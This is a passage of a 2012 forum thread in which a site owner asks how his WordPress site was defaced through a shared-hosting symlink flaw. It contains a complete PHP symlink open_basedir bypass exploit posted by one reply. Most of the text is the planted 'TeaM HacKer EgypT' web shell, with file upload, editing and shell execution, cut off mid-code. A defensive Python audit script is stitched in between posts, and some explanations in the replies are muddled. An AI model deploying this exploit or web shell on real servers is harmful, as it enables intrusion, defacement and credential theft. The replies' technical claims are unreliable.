
My site was hacked! (how can i protect myself?)

Discussion in 'BlackHat Lounge' started by IKbentim, Feb 27, 2012.

  1. IKbentim

    IKbentim Power Member

    Hey guys,

    Just woke up to the news that my site was hacked. It was fixed in 2 seconds, they only replaced the index. But how did they do it?

    Checked the logs for my server and the guy came from this site
    http://www.distributedsystemsltd.com/Main/1/Sym.php?sws=sym

    Now this basically tells what and how to hack, but how can I protect myself against that sort of shenanigans?
     
  2. ziplack

    ziplack Senior Member

    change your cPanel password
    check your themes for hidden hacks
    check your cPanel logs for activity
    change your WordPress password
    remove any nulled plugin
    recheck .htaccess (maybe it's compromised)
    talk to your hosting provider (tell them you were hacked), they need to check their logs
    update all your plugins
     
  3. IKbentim

    IKbentim Power Member

    Hi,

    Thanks for your post. I sent my host a clear email with exactly what happened and exactly how they did it. And they sent me back some email saying "make sure your password is safe and make sure your wordpress is up to date". I pay these guys hundreds of dollars for that shit.

    I've checked the logs and I know who's doing it. But the only way to stop it is to change something in Apache.. which I can't access.
     
  4. IKbentim

    IKbentim Power Member

    The "CEO" just contacted me on twitter saying i should be checking my computer for viruses because it happened on my side..

    Namecheap you were supposed to be the chosen one :'(

    http://youtu.be/HUBWxiu5cOo

    ugh, just did a whois on all the domains on the list turns out they're all hosted by namecheap.
     
    Last edited: Feb 27, 2012
  5. Dark-X

    Dark-X Newbie

    That doesn't mean that it's your fault. Your site may be hacked through another site, there are a lot of ways to do that. Maybe the server was the target and everything went wrong, or maybe only your site was the target.

    If you are using WP, Joomla or whatever script you are using, the best way to protect is to dump the SQL database, then reinstall the script and reupload the SQL. Change passwords on everything and allow access to FTP and SSH only from 2 or 3 IPs if they are static. Where the admin directory is, put password protection on it :) That will fix a lot of things and that's all I can remember for now. If you still have problems, PM me and we will talk in private :)
     
  6. BombaRuLz

    BombaRuLz Regular Member

    Don't worry dude, your site isn't hacked. There is just a way to upload an index.html file without permissions. This happened to me a few months ago and it's really annoying. It seems that "hackers" lol, can somehow upload an index.html file if there isn't any in the main folder (I guess you are using WordPress = index.php).

    Just chill and to be 100% change your file permissions on the files (the important ones) and make a backup more often.

    Cheers
     
  7. IKbentim

    IKbentim Power Member

    Hey, thanks for your message. Actually there have been some new developments.

    So yesterday after the Vice President of Namecheap tweeted me this

    [image: screenshot of the tweet, not preserved]

    I was a bit upset. I take care of my computer and i KNEW it wasn't me causing this. I just knew it, for multiple reasons. Like for one i don't download weird things and i'm 100% sure my computer isn't compromised.

    So did a little digging, the 'hacker' on my site came from a site that has a big list of sites that could be hacked using this method. The bug was in Apache and enabled people to 'view' php files in the browser. So if you open wp-config.php in the browser you get my database info. So then they log into my database they change the email address pointing to the admin account and request a new password. They then change the index of wordpress with some defaced page and that's it. Site = 'hacked'.

    So about the list, i did some whois of the domains and Namecheap kept showing up. I had a little text file pasted the whois site a couple of times and whoised about 50 domains. All hosted by name cheap.

    So i contact the Vice President again saying look at this list. Are you sure it's my computer? Because all the people on the list are hosted by name cheap.

    Then he sent me that last tweet "i'm checking".

    A couple of hours later I got this email: they're going to chmod all files of all the people on Namecheap with 600 so they can't be accessed by anything other than the server IP. So I asked them why they were blaming me first and then doing research, and they sent me.

    Anyway that's the story. A couple of months ago i also had a problem with my blackberry, i was too late with my hosting payment and when i paid (an hour later) i couldn't access my business emails anymore on my blackberry. Only my gmail still worked.. now i host everything with name cheap so it was either Blackberry or Namecheap messing up. When i send them an email at first they said contact Blackberry and they'll fix it for you. Then i asked again and they said contact Blackberry we can't do anything for you. Blackberry said it couldn't be them because my Gmail still worked on my blackberry and i send them the IP addresses of my webhost, they checked it and nothing was blocked. So i contact Namecheap again and they finally checked for me and it turned out the Blackberry IP's were blocked in their firewall. After four months i could finally open my business emails again on my blackberry.

    I like name cheap, they do great deals for people. Hosting is always up, they have a lot of interactive competitions like twitter quizzes and Facebook. But the customer service needs some work.

    /end of rant

    Feels good to vent! i can get on with my work now ;)
     
  8. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    hello mate,

    I am a pen tester...as I get it your site has no problem inside it...let me explain to you in detail...what happens is...an attacker tries to search for vulnerable sites on the internet...it can be any type of vulnerability like SQL injection or cross site scripting, commonly known as [XSS] vulnerability...when he gets it...instead of attacking the site directly..he finds the server on which it is hosted...through whois information...so that he can attack more than one site at a time....now if he gets a single vulnerable site on that particular host server...he can access any site through it..whether it is vulnerable or not...:)


    Maybe this same thing happened with you...it's not your fault, neither your server's fault..it's the fault of that particular vulnerable site...but as we know nobody can say whether his site is vulnerable or not until doing some tests...:)


    And you said he just replaced the index. ... that means he is just practising on your server...so it's nothing to worry about...just do the things mentioned above by other mates...and do one more thing...write your server to do a "quick scan" for vulnerable sites on it...I think your server did not do that for many days...


    and for securing yourself...:

    there is no particular bot or software...which will give you protection against it...the only thing you can do is..
    1) keep checking your sites for SQL injection vulnerability
    2) for cross site scripting [XSS] vulnerability

    These two are the most common vulnerabilities which you find in the present internet world...and let me tell you friends...these two are not so effective if done by a newbie...but they are severe if performed by a professional...

    And there are 8 more vulnerabilities found in today's internet world...but they are too dangerous to perform..so I cannot mention them here...really sorry for that..
    and if anyone is interested to know about them just PM me...I will explain them to you...:)

    I HOPE THIS HELPS A BIT MATE...


    KEEP MAKING UNCOUNTABLE WEBSITE BUT DON'T FORGET TO TEST IT...:D

    IF ANY DOUBT FEEL FREE TO ASK I AM THERE FOR SECURITY....:D
     
  9. IKbentim

    IKbentim Power Member

    But it wasn't a SQL injection it was a symlink exploit
     
  10. michaelr1988

    michaelr1988 Regular Member

    Hi man, sorry to hear that your site got hacked. Try these plugins if you are using wordpress:

    bulletproof security
    login lockdown
     
  11. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Yes...I know it was not SQLi and neither [XSS], I just said those two for helping others to test it...and the one which you are telling, "symlink exploit", is nothing other than a bypass for authorization...the thing which happens in this is the attacker gets access to your server through other vulnerable sites and requests a new page...I mean a new website created by him and hosted on someone else's server...[get the point please, he does not come out of your server and do his request, instead he just requests his page on your server] what he does is he redirects your site to his page and in rare cases it happens that the destination URL, I mean his page URL, comes in your server log (it only happens if he is a newbie and is just practising) and this is done specially to steal confidential data...or you can say your private information like credit card, password details or some other important details, and other personal things...and if the server does not validate this new link, I mean his page URL...the attacker gets his gold out of your site....:D

    Now if you are having MySQL 5 and higher your error code will be something like this


    <?php
    /*
    PHP 5.2.12/5.3.1 symlink() open_basedir bypass

    CHUJWAMWMUZG
    */

    $fakedir="cx";
    $fakedep=16;

    $num=0; // offset of symlink.$num

    if(!empty($_GET['file'])) $file=$_GET['file'];
    else if(!empty($_POST['file'])) $file=$_POST['file'];
    else $file="";

    echo '<PRE><img
    src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit
    from <a
    href="http://securityreason.com/" title="Security Audit PHP">Security Audit
    Lab - SecurityReason</a> labs.
    <p>Script for legal use only.
    <p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
    <p>More: <a href="http://securityreason.com/">SecurityReason</a>
    <p><form name="form"
    action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
    "]).'" method="post"><input type="text" name="file" size="50"
    value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
    value="Create Symlink"></form>';

    if(empty($file))
    exit;

    if(!is_writable("."))
    die("not writable directory");

    $level=0;

    for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
    mkdir($fakedir);
    chdir($fakedir);
    }

    while(1<$as--) chdir("..");

    $hardstyle = explode("/", $file);

    for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
    if(!file_exists($hardstyle[$a]))
    mkdir($hardstyle[$a]);
    chdir($hardstyle[$a]);
    $as++;
    }
    }
    $as++;
    while($as--)
    chdir("..");

    @rmdir("fakesymlink");
    @unlink("fakesymlink");

    @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

    // this loop will skip allready created symlinks.
    while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
    "symlink".$num))) break;
    else $num++;

    @unlink("fakesymlink");
    mkdir("fakesymlink");

    die('<FONT COLOR="RED">check symlink <a
    href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

    ?>

    your details are free to go to the attacker now...:D

    HOPE THIS HELPS YOU....

    IF YOU HAVE ANY PROBLEM IN UNDERSTANDING JUST LET ME KNOW I WILL EXPLAIN YOU...:)

    I AM ALWAYS READY TO HELP OTHERS...:D
     
  12. IKbentim

    IKbentim Power Member

    Very nice of you, thanks. However i've fixed it by chmoding everything 600 and renaming my wp-config. People can still hack everything with a lot of effort, but i don't think they will.
     
  13. resistancee

    resistancee Registered Member

    First clear your PC, boot into safe mode - run ComboFix & Malwarebytes. After that thoroughly check your FTP logs!
     
  14. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    YOU ARE MOST WELCOME MATE...:)
    As this exploit allows cross scripting between user account home directories. This is not a root exploit and if Apache is secured it is most likely not going to affect you. However if Apache is not secured it then allows attackers to use further exploits to gain root access. I would highly suggest to lock down /bin/ln file. The most aggravating issue with this exploit is it allows quick linking between public_html directories to where many different sites are vulnerable to being vandalized. The exploit will link to the apache log files to map the virtual home directories and automates the symlink process. This exploit leaves the following footprint:

    ls -la --author /usr/local/apache/logs/fpcgisock
    srwx------ 1 nobody root nobody 0 Jul 1 21:05 /usr/local/apache/logs/fpcgisock=


    THIS WAS JUST A SUGGESTION FROM ME...SO THAT YOU DON'T GET THIS PROBLEM AGAIN...

    JUST TRYING TO HELP YOU SECURE YOURSELF FROM GETTING HACKED FURTHER...:D
     
    Last edited: Feb 28, 2012
  15. sockpuppet

    sockpuppet Junior Member

    @sumit2531
    stop posting random old shit you just found on google

    "cPanel Symlink Exploit, Security Advisory July 21 2008"

    Date : 13.11.2009

    WTF?!?


    after reading this thread i would say the problem was(or still is) a poorly configured apache server that allowed you to use "FollowSymLinks", you could test this with a simple .htaccess = "Options +FollowSymLinks"


    kudos to IKbentim for figuring this all out and telling namecheap!
     
    • Thanks Thanks x 1
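
The diagnosis reached in the thread (a link in one account's web root exposing another account's wp-config.php, answered with chmod 600 and with not letting Apache follow arbitrary symlinks) can be checked from the defender's side. This is an added example, not part of any post: a Python audit of one account's document root. The directory layout, the function names and every file name other than wp-config.php are assumptions, and the sample tree is constructed.

```python
import os
import stat
import tempfile
from pathlib import Path

# wp-config.php is the file named in the thread; the other names are
# assumptions added for illustration.
SENSITIVE_NAMES = {"wp-config.php", "configuration.php", ".htpasswd"}


def audit_docroot(docroot, account_home):
    """Return a sorted list of (kind, path, detail) findings for one account.

    kind is one of:
      "symlink-escape"  the link resolves to a path outside account_home
      "symlink-owner"   link and target have different owners, the same
                        comparison Apache's SymLinksIfOwnerMatch option makes
      "loose-perms"     a sensitive file is accessible to group or other
    """
    findings = []
    home = os.path.realpath(account_home)
    # followlinks=False: links are reported but never descended into.
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat describes the link itself
            if stat.S_ISLNK(st.st_mode):
                target = os.path.realpath(path)
                if os.path.commonpath([home, target]) != home:
                    findings.append(("symlink-escape", path, target))
                try:
                    if os.stat(path).st_uid != st.st_uid:
                        findings.append(("symlink-owner", path, target))
                except OSError:
                    pass  # dangling or looping link: nothing is readable through it
            elif stat.S_ISREG(st.st_mode) and name in SENSITIVE_NAMES:
                if st.st_mode & 0o077:
                    findings.append(
                        ("loose-perms", path, oct(st.st_mode & 0o777)))
    return sorted(findings)


def build_demo_tree(base):
    """Constructed sample: two accounts on one shared host."""
    alice = Path(base, "home", "alice", "public_html")
    bob = Path(base, "home", "bob", "public_html")
    alice.mkdir(parents=True)
    bob.mkdir(parents=True)

    cfg = bob / "wp-config.php"
    cfg.write_text("<?php /* constructed placeholder, no real credentials */\n")
    cfg.chmod(0o644)  # world-readable, the state before the chmod 600 fix

    # A link in alice's web root that resolves into bob's account.
    (alice / "notes.txt").symlink_to(cfg)

    # A link that stays inside alice's own home must not be reported.
    (alice / "index.html").write_text("hello\n")
    (alice / "home.html").symlink_to(alice / "index.html")
    return alice, bob


if __name__ == "__main__":
    base = tempfile.mkdtemp(prefix="symlink-audit-")
    alice, bob = build_demo_tree(base)
    for root in (alice, bob):
        for kind, path, detail in audit_docroot(root, root.parent):
            print(f"{kind:15} {path} -> {detail}")
```

On a real shared host the two accounts have different UIDs, so the planted link would also be reported as "symlink-owner"; in the constructed tree both sides belong to the user running the script.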
  16. IKbentim

    IKbentim Power Member

    This is what they replaced my index with in wordpress

    Code:
    
    <?php
    /*
     * TeaM HacKer EgypT - a simple Web-based file manager
     * Copyright (C) 2004  TeaM HacKer EgypT <>
     *
     * This program is free software; you can redistribute it and/or modify
     * it under the terms of the GNU General Public License as published by
     * the Free Software Foundation; either version 2 of the License, or
     * (at your option) any later version.
     *
     * This program is distributed in the hope that it will be useful,
     * but WITHOUT ANY WARRANTY; without even the implied warranty of
     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
     * GNU General Public License for more details.
     *
     * You should have received a copy of the GNU General Public License
     * along with this program; if not, write to the Free Software
     * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
     *
     * -------------------------------------------------------------------------
     * While using this script, do NOT navigate with your browser's back and
     * forward buttons! Always open files in a new browser tab!
     * -------------------------------------------------------------------------
     *
     * This is Version 0.9, revision 9
     * =========================================================================
     *
     * Changes of revision 9
     * <>
     *    added workaround for directory listing, if lstat() is disabled
     *    fixed permisson of uploaded files (thanks to Stephan Duffner)
     *
     * Changes of revision 8
     * <okankan@stud.sdu.edu.tr>
     *    added Turkish translation
     * <j@kub.cz>
     *    added Czech translation
     * <>
     *    improved charset handling
     *
     * Changes of revision 7
     * <szuniga@vtr.net>
     *    added Spanish translation
     * <lars@soelgaard.net>
     *    added Danish translation
     * <>
     *    improved rename dialog
     *
     * Changes of revision 6
     * <nederkoorn@tiscali.nl>
     *    added Dutch translation
     *
     * Changes of revision 5
     * <>
     *    added language auto select
     *    fixed symlinks in directory listing
     *    removed word-wrap in edit textarea
     *
     * Changes of revision 4
     * <daloan@guideo.fr>
     *    added French translation
     * <anders@wiik.cc>
     *    added Swedish translation
     *
     * Changes of revision 3
     * <nzunta@gabriele-erba.it>
     *    improved Italian translation
     *
     * Changes of revision 2
     * <>
     *    got images work in some old browsers
     *    fixed creation of directories
     *    fixed files deletion
     *    improved path handling
     *    added missing word 'not_created'
     * <till@tuxen.de>
     *    improved human readability of file sizes
     * <nzunta@gabriele-erba.it>
     *    added Italian translation
     *
     * Changes of revision 1
     * <>
     *    TeaM HacKer EgypT completely rewritten:
     *    - clean XHTML/CSS output
     *    - several files selectable
     *    - support for windows servers
     *    - no more treeview, because
     *      - TeaM HacKer EgypT is a >simple< file manager
     *      - performance problems (too much additional code)
     *      - I don't like: frames, java-script, to reload after every treeview-click
     *    - execution of shell scripts
     *    - introduced revision numbers
     *
    /* ------------------------------------------------------------------------- */
    
    /* Your language:
     * 'en' - English
     * 'de' - German
     * 'fr' - French
     * 'it' - Italian
     * 'nl' - Dutch
     * 'se' - Swedish
     * 'sp' - Spanish
     * 'dk' - Danish
     * 'tr' - Turkish
     * 'cs' - Czech
     * 'auto' - autoselect
     */
    $lang = 'auto';
    
    /* Charset of output:
     * possible values are described in the charset table at
     * http://www.php.net/manual/en/function.htmlentities.php
     * 'auto' - use the same charset as the words of my language are encoded
     */
    $site_charset = 'auto';
    
    /* Homedir:
     * For example: './' - the script's directory
     */
    $homedir = './';
    
    /* Size of the edit textarea
     */
    $editcols = 80;
    $editrows = 25;
    
    /* -------------------------------------------
     * Optional configuration (remove # to enable)
     */
    
    /* Permission of created directories:
     * For example: 0705 would be 'drwx---r-x'.
     */
    # $dirpermission = 0705;
    
    /* Permission of created files:
     * For example: 0604 would be '-rw----r--'.
     */
    # $filepermission = 0604;
    
    /* Filenames related to the apache web server:
     */
    $htaccess = '.htaccess';
    $htpasswd = '.htpasswd';
    
    /* ------------------------------------------------------------------------- */
    
    if (get_magic_quotes_gpc()) {
    	array_walk($_GET, 'strip');
    	array_walk($_POST, 'strip');
    	array_walk($_REQUEST, 'strip');
    }
    
    if (array_key_exists('image', $_GET)) {
    	header('Content-Type: image/gif');
    	die(getimage($_GET['image']));
    }
    
    if (!function_exists('lstat')) {
    	function lstat ($filename) {
    		return stat($filename);
    	}
    }
    
    $delim = DIRECTORY_SEPARATOR;
    
    if (function_exists('php_uname')) {
    	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    } else {
    	$win = ($delim == '\\') ? true : false;
    }
    
    if (!empty($_SERVER['PATH_TRANSLATED'])) {
    	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
    } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
    } elseif (function_exists('getcwd')) {
    	$scriptdir = getcwd();
    } else {
    	$scriptdir = '.';
    }
    $homedir = relative2absolute($homedir, $scriptdir);
    
    $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
    
    if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    	$dir = relative2absolute($dir, $_POST['olddir']);
    }
    
    $directory = simplify_path(addslash($dir));
    
    $files = array();
    $action = '';
    if (!empty($_POST['submit_all'])) {
    	$action = $_POST['action_all'];
    	for ($i = 0; $i < $_POST['num']; $i++) {
    		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
    			$files[] = $_POST["file$i"];
    		}
    	}
    } elseif (!empty($_REQUEST['action'])) {
    	$action = $_REQUEST['action'];
    	$files[] = relative2absolute($_REQUEST['file'], $directory);
    } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    	$files[] = $_FILES['upload'];
    	$action = 'upload';
    } elseif (array_key_exists('num', $_POST)) {
    	for ($i = 0; $i < $_POST['num']; $i++) {
    		if (array_key_exists("submit$i", $_POST)) break;
    	}
    	if ($i < $_POST['num']) {
    		$action = $_POST["action$i"];
    		$files[] = $_POST["file$i"];
    	}
    }
    if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
    	$files[] = relative2absolute($_POST['create_name'], $directory);
    	switch ($_POST['create_type']) {
    	case 'directory':
    		$action = 'create_directory';
    		break;
    	case 'file':
    		$action = 'create_file';
    	}
    }
    if (sizeof($files) == 0) $action = ''; else $file = reset($files);
    
    if ($lang == 'auto') {
    	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
    		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    	} else {
    		$lang = 'en';
    	}
    }
    
    $words = getwords($lang);
    
    if ($site_charset == 'auto') {
    	$site_charset = $word_charset;
    }
    
    $cols = ($win) ? 4 : 7;
    
    if (!isset($dirpermission)) {
    	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
    }
    if (!isset($filepermission)) {
    	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
    }
    
    if (!empty($_SERVER['SCRIPT_NAME'])) {
    	$self = html(basename($_SERVER['SCRIPT_NAME']));
    } elseif (!empty($_SERVER['PHP_SELF'])) {
    	$self = html(basename($_SERVER['PHP_SELF']));
    } else {
    	$self = '';
    }
    
    if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
    		$apache = true;
    	} else {
    		$apache = false;
    	}
    } else {
    	$apache = true;
    }
    
    switch ($action) {
    
    case 'view':
    
    	if (is_script($file)) {
    
    		/* highlight_file is a mess! */
    		ob_start();
    		highlight_file($file);
    		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
    		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
    		ob_end_clean();
    
    		html_header();
    		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
    
    <hr />
    
    <table>
    <tr>
    <td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
    <pre style="margin-top: 0"><code>';
    
    		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
    
    		echo '</code></pre>
    </td>
    <td style="text-align: left; vertical-align: top; padding-left: 3pt">
    <pre style="margin-top: 0">' . $src . '</pre>
    </td>
    </tr>
    </table>
    
    ';
    
    		html_footer();
    
    	} else {
    
    		header('Content-Type: ' . getmimetype($file));
    		header('Content-Disposition: filename=' . basename($file));
    
    		readfile($file);
    
    	}
    
    	break;
    
    case 'download':
    
    	header('Pragma: public');
    	header('Expires: 0');
    	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    	header('Content-Type: ' . getmimetype($file));
    	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
    	header('Content-Length: ' . filesize($file));
    
    	readfile($file);
    
    	break;
    
    case 'upload':
    
    	$dest = relative2absolute($file['name'], $directory);
    
    	if (@file_exists($dest)) {
    		listing_page(error('already_exists', $dest));
    	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
    		@chmod($dest, $filepermission);
    		listing_page(notice('uploaded', $file['name']));
    	} else {
    		listing_page(error('not_uploaded', $file['name']));
    	}
    
    	break;
    
    case 'create_directory':
    
    	if (@file_exists($file)) {
    		listing_page(error('already_exists', $file));
    	} else {
    		$old = @umask(0777 & ~$dirpermission);
    		if (@mkdir($file, $dirpermission)) {
    			listing_page(notice('created', $file));
    		} else {
    			listing_page(error('not_created', $file));
    		}
    		@umask($old);
    	}
    
    	break;
    
    case 'create_file':
    
    	if (@file_exists($file)) {
    		listing_page(error('already_exists', $file));
    	} else {
    		$old = @umask(0777 & ~$filepermission);
    		if (@touch($file)) {
    			edit($file);
    		} else {
    			listing_page(error('not_created', $file));
    		}
    		@umask($old);
    	}
    
    	break;
    
    case 'execute':
    
    	chdir(dirname($file));
    
    	$output = array();
    	$retval = 0;
    	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
    
    	$error = ($retval == 0) ? false : true;
    
    	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
    
    	if ($error) {
    		listing_page(error('not_executed', $file, implode("\n", $output)));
    	} else {
    		listing_page(notice('executed', $file, implode("\n", $output)));
    	}
    
    	break;
    
    case 'delete':
    
    	if (!empty($_POST['no'])) {
    		listing_page();
    	} elseif (!empty($_POST['yes'])) {
    
    		$failure = array();
    		$success = array();
    
    		foreach ($files as $file) {
    			if (del($file)) {
    				$success[] = $file;
    			} else {
    				$failure[] = $file;
    			}
    		}
    
    		$message = '';
    		if (sizeof($failure) > 0) {
    			$message = error('not_deleted', implode("\n", $failure));
    		}
    		if (sizeof($success) > 0) {
    			$message .= notice('deleted', implode("\n", $success));
    		}
    
    		listing_page($message);
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\t<b>" . word('really_delete') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
    	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
    </td>
    </tr>
    </table>
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'rename':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (!@file_exists($dest) && @rename($file, $dest)) {
    			listing_page(notice('renamed', $file, $dest));
    		} else {
    			listing_page(error('not_renamed', $file, $dest));
    		}
    
    	} else {
    
    		$name = basename($file);
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    	<input type="hidden" name="action" value="rename" />
    	<input type="hidden" name="file" value="' . html($file) . '" />
    	<input type="hidden" name="dir" value="' . html($directory) . '" />
    	<b>' . word('rename_file') . '</b>
    	<p>' . html($file) . '</p>
    	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
    	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
    	<hr />
    	<input type="submit" value="' . word('rename') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'move':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		$failure = array();
    		$success = array();
    
    		foreach ($files as $file) {
    			$filename = substr($file, strlen($directory));
    			$d = $dest . $filename;
    			if (!@file_exists($d) && @rename($file, $d)) {
    				$success[] = $file;
    			} else {
    				$failure[] = $file;
    			}
    		}
    
    		$message = '';
    		if (sizeof($failure) > 0) {
    			$message = error('not_moved', implode("\n", $failure), $dest);
    		}
    		if (sizeof($success) > 0) {
    			$message .= notice('moved', implode("\n", $success), $dest);
    		}
    
    		listing_page($message);
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\t<b>" . word('move_files') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	' . word('destination') . ':
    	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    	<input type="submit" value="' . word('move') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'copy':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (@is_dir($dest)) {
    
    			$failure = array();
    			$success = array();
    
    			foreach ($files as $file) {
    				$filename = substr($file, strlen($directory));
    				$d = addslash($dest) . $filename;
    				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
    					$success[] = $file;
    				} else {
    					$failure[] = $file;
    				}
    			}
    
    			$message = '';
    			if (sizeof($failure) > 0) {
    				$message = error('not_copied', implode("\n", $failure), $dest);
    			}
    			if (sizeof($success) > 0) {
    				$message .= notice('copied', implode("\n", $success), $dest);
    			}
    
    			listing_page($message);
    
    		} else {
    
    			if (!@file_exists($dest) && @copy($file, $dest)) {
    				listing_page(notice('copied', $file, $dest));
    			} else {
    				listing_page(error('not_copied', $file, $dest));
    			}
    
    		}
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog">
    <tr>
    <td class="dialog">
    ';
    
    		request_dump();
    
    		echo "\n<b>" . word('copy_files') . '</b>
    	<p>
    ';
    
    		foreach ($files as $file) {
    			echo "\t" . html($file) . "<br />\n";
    		}
    
    		echo '	</p>
    	<hr />
    	' . word('destination') . ':
    	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    	<input type="submit" value="' . word('copy') . '" />
    </td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'create_symlink':
    
    	if (!empty($_POST['destination'])) {
    
    		$dest = relative2absolute($_POST['destination'], $directory);
    
    		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
    
    		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
    
    		if (!@file_exists($dest) && @symlink($file, $dest)) {
    			listing_page(notice('symlinked', $file, $dest));
    		} else {
    			listing_page(error('not_symlinked', $file, $dest));
    		}
    
    	} else {
    
    		html_header();
    
    		echo '<form action="' . $self . '" method="post">
    
    <table class="dialog" id="symlink">
    <tr>
    	<td style="vertical-align: top">' . word('destination') . ': </td>
    	<td>
    		<b>' . html($file) . '</b><br />
    		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
    		<label for="checkbox_relative">' . word('relative') . '</label>
    		<input type="hidden" name="action" value="create_symlink" />
    		<input type="hidden" name="file" value="' . html($file) . '" />
    		<input type="hidden" name="dir" value="' . html($directory) . '" />
    	</td>
    </tr>
    <tr>
    	<td>' . word('symlink') . ': </td>
    	<td>
    		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
    		<input type="submit" value="' . word('create_symlink') . '" />
    	</td>
    </tr>
    </table>
    
    <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
    
    </form>
    
    ';
    
    		html_footer();
    
    	}
    
    	break;
    
    case 'edit':
    
    	if (!empty($_POST['save'])) {
    
    		$content = str_replace("\r\n", "\n", $_POST['content']);
    
    		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
    			listing_page(notice('saved', $file));
    		} else {
    			listing_page(error('not_saved', $file));
    		}
    
    	} else {
    
    		if (@is_readable($file) && @is_writable($file)) {
    			edit($file);
    		} else {
    			listing_page(error('not_edited', $file));
    		}
    
    	}
    
    	break;
    
    case 'permission':
    
    	if (!empty($_POST['set'])) {
    
    		$mode = 0;
